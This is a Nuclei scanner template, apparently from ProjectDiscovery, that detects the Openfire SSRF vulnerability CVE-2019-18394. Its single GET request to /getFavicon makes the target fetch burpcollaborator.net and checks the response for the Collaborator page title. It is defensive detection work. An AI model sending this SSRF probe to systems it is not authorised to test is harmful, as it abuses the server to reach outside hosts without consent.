17 lines
381 B
YAML
17 lines
381 B
YAML
|
id: CVE-2019-18394
|
||
|
|
||
|
info:
|
||
|
name: Openfire Full Read SSRF
|
||
|
author: pdteam - nuclei.projectdiscovery.io
|
||
|
severity: critical
|
||
|
|
||
|
# Source:- https://swarm.ptsecurity.com/openfire-admin-console/
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/getFavicon?host=burpcollaborator.net"
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- <h1>Burp Collaborator Server</h1>
|